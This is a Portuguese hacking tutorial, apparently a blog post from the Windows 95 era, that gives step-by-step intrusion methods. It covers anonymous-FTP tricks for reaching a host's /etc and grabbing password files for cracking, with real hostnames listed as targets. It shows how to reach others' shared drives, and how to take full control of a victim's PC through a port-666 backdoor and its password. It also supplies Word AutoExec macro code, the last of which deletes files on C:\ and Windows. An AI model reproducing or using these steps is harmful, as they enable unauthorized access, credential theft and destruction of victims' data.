Em primeiro lugar quero deixar bem claro que não me responsabilizo por qualquer acto cometido por informações extraídas destes documentos. Tudo o que você fizer é de sua inteira responsabilidade.
Saber de uma determinada matéria (seja ela qual for) não é nem nunca foi crime.
1º) Várias
são as fantasias e a imaginação das pessoas
sobre as diversas figuras assustadoras que navegam no
mundo virtual. Vamos começar por definir o que são e
quem são estas figuras:
Cracker: O mesmo que "hacker", com a diferença de utilizar seus conhecimentos para o "mal". Destruir e roubar são as suas palavras de ordem.
Lamer: É na verdade o chamado otário. Cada um acha uma pessoa otária por um motivo. Mas neste caso, é otário, porque chateia os outros. Anuncia aos quatro cantos as burrices que faz, e acha-se o máximo.
Wannable: É o principiante que já aprendeu a usar os programas preparados pelos verdadeiros "hackers".
Cavalo de Tróia (Trojan Horse): Semelhante ao famoso presente dos troianos, onde dentro do belo cavalo de madeira, estavam escondidos centenas de soldados prontos para atacar a cidade presenteada, programas úteis ou inúteis, ou simples jogos, possuem dentro deles, códigos capazes de não só executar a função proposta, como também, destruir, armazenar, ou copiar informações do sistema. Temos como exemplo, programas que imitam "login" de um provedor e armazenam esta informação em locais onde posteriormente o "curioso" poderá recuperá-la facilmente..
Backdoors: São passagens secretas, ou "porta dos fundos", isto é, senha secreta criada pelo autor do "software", não documentada, é claro, que independente do administrador do sistema pode ser usada para acessar ilimitadamente a todos os recursos disponíveis. Farejamento de Redes: utilizando-se do empacotamento das mensagens nas redes de computadores, programas especialistas procuram neles palavras como "password" e "senha". Quando encontradas, o programa copia o pacote e envia-o para o computador do "hacker", que então se utiliza de técnicas próprias para tentar descodificá-las, pois as senhas estão todas “criptografadas".
Invasão de servidores: Através de "ftp" anónimo, pode-se roubar o arquivo que contêm as "passwords" dos usuários e, através de técnicas de tentativa de "decriptografias", obter "passwords" deste provedor.
2º) Invasões
a) Invasão por FTP:
Para Hackear em FTP, primeiro você deve
saber o endereço do Host ou seu IP, para isso
use
o IPSCAN, digitando o IP Principal do
Host:
Lista de Alguns FTP's :
ftp.mandic.com.br
ftp.bestway.com.br
ftp.internetclub.com.br
ftp.netscape.com
ftp.angelfire.com
Let's HaCk
!!!
Vá ao MS-DOS
e digite FTP, ao aparecer o prompt ftp>, digite OPEN, irá
abrir um outro
Prompt (to), digite o nome
do host ou o IP, tipo (to) ftp.mandic.com.br.
Ao conectar, ele
pedirá a senha e a Password, tente
usar os passwords UNIX, se não der você deve
entrar
INVISÍVEL!
Como entrar
Invisível?
No login
pressione ENTER, no password pressione novamente ENTER, irá
aparecer o prompt
ftp> novamente...., ai é só digitar... quote user
ftp , pressione ENTER e digite: quote cwd
~root, pressione ENTER
novamente e digite: quote pass
ftp
Pronto, você
está Hackeando... Mas tem um porém..., se escrever
amensagem : user restriction aplly, você
não esta Hackeando.., pois
estáaplicada
a protecção, para isto tente com outro user tipo
quote cwd ~sys eos
outros da lista UNIX....
Meu
Deus... eu entrei e agora o que
faço?
Ao entrar você
vai estar no Directório do login, tipo
\home\root\,
Dê
cd\etc e você vai estar no lugar certo. Aí é
consigo, descubra o quefazer.
Se você tiver o arquivo de senhas, este vai estar
criptografado, você vai precisar de um
aplicativo para o descriptografar, tipo o Crack Jack
.
Não me
responsabilizo por actos cometidos nos hosts... O problema é
de quem hackeia, e não meu. Tome cuidado e nunca apague
nada!!!
b) Invasão por
IP:
Todos os que utilizam a
rede Dial-Up do Win95 (em desuso) para a sua conexão com a
internet podem estar a correr sérios riscos a não
ser, é claro, que assim se conectem propositadamente,
com
intenções"diversas". Utilizar-se de uma
conexão PPP do Win95 num provedor de acesso, significa estar
a disponibilizar o seu computador a todos os usuário da
internet. Mesmo sem o
compartilhamento de arquivos, existem diversas ferramentas que
permitem a outra pessoa conectar-se ao seu computador caso
você esteja a utilizar esse tipo de conexão.
Conecte-se à Internet
utilizando a rede Dial- Up do Win95. Se o seu provedor não
disponibilizar uma conexão do tipo PPP, estas dicas
não funcionarão. Verifique antes, se você
possui os drivers -
clientes para redes
Microsoft -. Caso não estejam instalados, instale-os
através do Painel de Controlo, no ícone Redes.
Verifique também se o compartilhamento de Arquivos e
Impressoras está instalado. Se estiver,
você estará sujeito a que outra pessoa se conecte ao
seu computador simplesmente sabendo o seu IP. Se bem que, para
aqueles que já sabem, existem mil maneiras diferentes de se
"burlar" a
fraquinha segurança do Win95. Para você poder
encontrar outros computadores compartilhados, você deve
configurar WINS LMHOSTS. O WINS é utilizado para localizar
os computadores com IP
fixo. O LMHOSTS , é accionado automaticamente na procura de
computadores que possuem IPs
dinâmicos.
Configurar
essas opções é simples. Vá ao Painel de
Controlo e abra Rede. Verifique as propriedades do protocolo
TCP/IP. Aí você encontrará a
opção para activar a resolução WINS. No
caso de você não conhecer nenhum servidor WINS,
utilize 204.118.34.6 como primário e 204.118.34.11 como
secundário. Estes servidores são dos E.U.A, e
são gratuitos. Caso queira outros endereços, utilize
um
dos mecanismos de busca na Internet. Para configurar o LMHOSTS,
você precisa de criar um arquivo de texto simples,
utilizando-se até mesmo o Bloco de Notas do Windows. O
arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que
ficarão os endereços de IP e os nomes dos
computadores que você terá acesso. Para localizar um
determinado computador, você digita o seu número
de
IP e a seguir a sua NetBios, na mesma linha, separados por um
espaço. Se você executar o programa NBSTSTAT, seguido
da opção-N, você obterá essa lista, com
o nome e o IP do seu computador sempre sendo o primeiro da lista,
seguido das outras máquinas disponíveis, tudo numa
janela do MS-DOS. Através do Explorer você
poderá ver os computadores disponíveis na rede, dos
quais você
ainda poderá utilizar os discos, mapeando-os, o que os
tornará unidades do seu
computador.
c) Invasão
pela porta 666
É uma
invasão fácil, mas no entanto, você irá
precisar do programa Aabout . E a víctima
também.
Procedimento:
Primeiro
você deve contactar a vítima e fazê-la executar
o programa Aabout, depois entre
no telnet do Windows (C:\windows\telnet.exe). Vá ao menu
Conectar e clique em Sistema
Remoto. Vai aparecer uma tela para o login. Como host, coloque o IP
dinâmico da vítima e
como porta, digite
666. Clique em conectar. No login, digite a
palavra gr! (é 'gr' com o ponto de
exclamação)
Agora aparece um PROMPT, no qual você tem controle total sobre o PC da vítima. Use os comandos do DOS.
Agora aparece um PROMPT, no qual você tem controle total sobre o PC da vítima. Use os comandos do DOS.
3º) Fazer vírus de macro:
Ainda
hoje existe muita gente que só
é capaz de abrir o Word,
editar,negritar, sublinhar e mandar imprimir.
Muitos milhares de pessoas só
sabemmexer
no básico mesmo. Eles nem imaginam o que existe por de
trás desteriquíssimo
processador de texto.
Esta
matéria tem como objectivo fazer desde pequenas até
grandessacanagens
com usuários burros.
PS: Software/versão abrangida: Word da Microsoft,
versões 6 (win3.11)e
7.0 (win95).
O Word possui um
arquivo chamado "normal.dot" onde estão
todasas
configurações padrão do Word. Se por algum
motivo este arquivo forapagado
do computador, o Word cria-o outra vez automaticamente quando for
reiniciado.
Níveis de sacanagem
:
Nível 1..... Apenas uma brincadeiraNível 2..... Apenas uma brincadeira de mau gostoNível 3..... Não é mais brincadeira!!!
Nível 1..... Apenas uma brincadeiraNível 2..... Apenas uma brincadeira de mau gostoNível 3..... Não é mais brincadeira!!!
Primeiro você precisa de criar uma macro... siga os
passos:Entre
no Word, feche a janela de documento, não deixe nenhum
documento aberto(activo),
clique em Arquivo(File) depois Macro, coloque no nome da macro
"AutoExec"(obrigatório)
este macro é iniciado todas as vez que o Word for iniciado,
depois clique em 'Criar', delete as
duas linhas que tiverem (Sub MAIN e End Sub) e cole a
rotina que está mais
abaixo.
PS: Existem outras
formas/meios de criar uma macro, mas esta é mais
simples.
Nível
1
O nível 1
serve para você dar nas vistas, mostrando que entende do
Wordmelhor do que
ninguém.
Cada vez que o usuário iniciar o Word receberá uma
mensagem de alertaou
qualquer outra mensagem que você queira. Veja
abaixo.
Sub
MAIN
MsgBox "Você ‚ é otário! Eu não
irei prosseguir com o sistema", "Microsoft Word",
5
MsgBox "Usuário Pirata Detectado", "FATAL ERROR",
16
MsgBox "Vai dormir e deixa-me descançar ", "Net Killers",
64
End Sub
Nível
2
O
Nível 2 é para deixar o usuário
irritadíssimo.
No corpo da macro cole este texto
abaixo:
Sub
MAIN
ArquivoNovoPadrão
Inserir "Shadow"
ArquivoNovoPadrão
Inserir "Net"
ArquivoNovoPadrão
Inserir "Killer"
ArquivoNovoPadrão
Inserir "Shadow Net Killer
"
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir
"."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir
"."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir
"."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "Shadow Net
Killer "
End Sub
Nível
3
O
Nível 3, bom este nível é pura sacanagem, com
ele um simples clique do rato, etudo
desaparece! Isso mesmo "del *.*" ou apenas os documentos,
você é que
escolhe.
Sub
MAIN
Kill "C:\*.*"
Kill
"C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub
Lembre-se de que estes macros, são
gravados no arquivo default do Word,
ou seja no 'normal.dot' se este arquivo for apagado, o Word
cria-o outra vez
automaticamente quando este for reiniciado, então se
você for fazer estas sacanagens ,
proteja este arquivo, com o comando 'attrib
+r'.
Nenhum comentário:
Postar um comentário